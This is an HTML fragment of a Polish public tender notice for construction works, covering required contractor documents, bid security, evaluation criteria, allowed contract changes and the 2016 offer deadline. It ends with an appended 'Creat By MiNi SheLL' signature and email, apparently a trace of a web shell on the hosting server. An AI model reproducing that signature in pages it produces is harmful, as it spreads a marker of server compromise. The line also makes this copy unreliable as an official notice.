                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">

1.1.	Dokumenty i oświadczenia, które Wykonawca będzie zobowiązany złożyć na wezwanie Zamawiającego  dotyczy wykonawcy, którego oferta została najwyżej oceniona.
Wykaz dokumentów i oświadczeń składanych na wezwanie Zamawiającego na potwierdzenie okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp:
1)	W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu należy przedłożyć:
Lp.	Wymagany dokument
1	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty;
2	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.

2)	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia należy przedłożyć:
Lp.	Wymagany dokument
1	Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej
Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
Wykonawca na wezwanie Zamawiającego złoży powyższy dokument lub wskaże miejsce/stronę, z której Zamawiający może pobrać wymagany dokument.

3)	Dokumenty podmiotów zagranicznych:
Lp.	Wymagany dokument
1	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
 nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu należy przedłożyć:
Lp.	Wymagany dokument
1	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty;
2	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1	Wypełniony formularz ofertowy (załącznik nr 1 do SIWZ wraz z załącznikami), w tym Wykaz części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom  załącznik do formularza oferty).
2	Opcjonalnie, jeśli występuje pełnomocnik  pełnomocnictwo (w oryginale lub notarialnie potwierdzonej kopii) dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną.
3	Projekt umowy 
4	Dowód wniesienia wadium. 
W przypadku wnoszenia wadium w formie pieniężnej zaleca się dołączenie do oferty potwierdzenia dokonania przelewu bankowego. W przypadku wnoszenia wadium w formie innej niż pieniężna oryginał dokumentu należy złożyć w Sekcji  Zamówień Publicznych, a kserokopię poświadczoną za zgodność z oryginałem przez Wykonawcę dołączyć do oferty
5	 Kosztorys ofertowy z podstawami nakładów, ilościami i cenami jednostkowymi robót wraz z wykazem wszystkich materiałów i urządzeń z podaniem dokładnych ich nazw handlowych, ilości i cen jednostkowych  wydruk w wersji szczegółowej.
Kosztorys ofertowy należy złożyć  w wersji elektronicznej na nośniku elektronicznym w wersji oryginalnych plików w programie kosztorysowym np. Norma, Rodos lub Zuzia lub w plikach możliwych do wczytania w przynajmniej jednym z podanych programów (np. format xml, ath, zuz, rds). 

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.1.	Oferta musi być zabezpieczona wadium w wysokości: 200 000.00 PLN (słownie:  dwieście tysięcy 00/100 PLN).
1.2.	Wadium należy wnieść w terminie do dnia i  do godz. składania ofert.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>kara umowna </td><td>15</td></tr><tr><td>skrócenie terminu </td><td>15</td></tr><tr><td>okres świadczenia usługi serwisu autoryzowanego</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Wszelkie zmiany niniejszej umowy wymagają zgody stron w formie pisemnej pod rygorem 
     nieważności. Zmiany umowy mogą być dokonywane z zachowaniem przepisu art. 140 ust. 
     3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz.U. 2010 r., Nr 113, poz. 759 z późn. zmianami). Przewiduje się dopuszczenie zmian w następującym   zakresie:
a)	Jakości lub innych parametrów materiałów lub urządzeń zaoferowanych w ofercie, przy czym zmiana taka może być spowodowana: pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót. Każdorazowo na taką zmianę musi wyrazić zgodę projektant sprawujący nadzór autorski,
b)	Osób przewidzianych do realizacji zamówienia w przypadku nieprzewidzianych zdarzeń losowych m.in. takich jak: śmierć, choroba, ustanie stosunku pracy, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w umowie,
c)	Podwykonawcy: jeżeli podwykonawca nie został zaakceptowany przez Zamawiającego, nie wykonuje prac z należytą starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go z Wykonawcą, pod warunkiem, że zapewni to prawidłową realizację umowy.
d)	Zmiany zakresu części prac powierzonych podwykonawcy w przypadku gdy:
	konieczność powierzenia przez Wykonawcę prac podwykonawcy spowodowana jest rozwiązaniem umów o pracę z pracownikami wykonującymi pracę w danej branży w takiej liczbie, która uniemożliwia realizację prac przez Wykonawcę,
	wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia,
	konieczność powierzenia prac podwykonawcy jest wynikiem zmiany technologii robót lub materiałów,
e)	Terminów realizacji przedmiotu zamówienia (w tym terminów pośrednich wynikających z harmonogramu robót), gdy jest ona spowodowana:  
1)	epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym,
2)	warunkami pogodowymi  uniemożliwiającymi wykonywanie prac zewnętrznych. (np. intensywne opady, powodzie)
3)	koniecznością wprowadzenia zmian do dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu stron, aktualizacją rozwiązań projektowych z uwagi na postęp technologiczny, 
4)	następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia.
5)	 brakiem możliwości dotrzymania przez Zamawiającego terminów udostępniania pomieszczeń lub frontów robót, zgodnie z planem realizacji budowy, stanowiącym załącznik do niniejszej umowy, a wynikającym z konieczności zapewnienia niezakłóconego funkcjonowania uczelni w zakresie prowadzenia zajęć dydaktycznych oraz pracy administracji Zamawiającego
6)	Uzyskania  wymaganych  decyzji i pozwoleń  niezbędnych  do  pozwolenia  na użytkowanie  obiektu
	f) Wyłączenia zakresu części prac w przypadku: okoliczności powodujących ograniczenie środków finansowych niezależnymi od Zamawiającego.
2. W przypadku ograniczenia części robót objętych zamówieniem Zamawiający zastrzega sobie prawo do ewentualnego obniżenia wynagrodzenia o wartość tych prac w związku z nadzwyczajnymi okolicznościami powodującymi ograniczenie środków finansowych.
Wykonawca  z  tego  tytułu nie  będzie  dochodził  praw  odszkodowawczych   
3. Podstawę obliczenia kosztów zmiany mającej wpływ na wynagrodzenie Wykonawcy wynikającej z ust.2 stanowić będzie kosztorys ofertowy.
4. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust.  1 i 2 termin zakończenia robót może ulec odpowiedniemu  przedłużeniu, nie dłużej jednak niż   o okres trwania tych okoliczności.
5. Zmiany wynagrodzenia Wykonawcy w przypadku zamiany stawki podatku VAT. 
6.  Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego oraz przez     Wykonawcę.
7.   Warunkiem dokonania zmian w umowie jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian, opis wypływu zmiany na termin wykonania umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/11/2016, godzina: 08:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com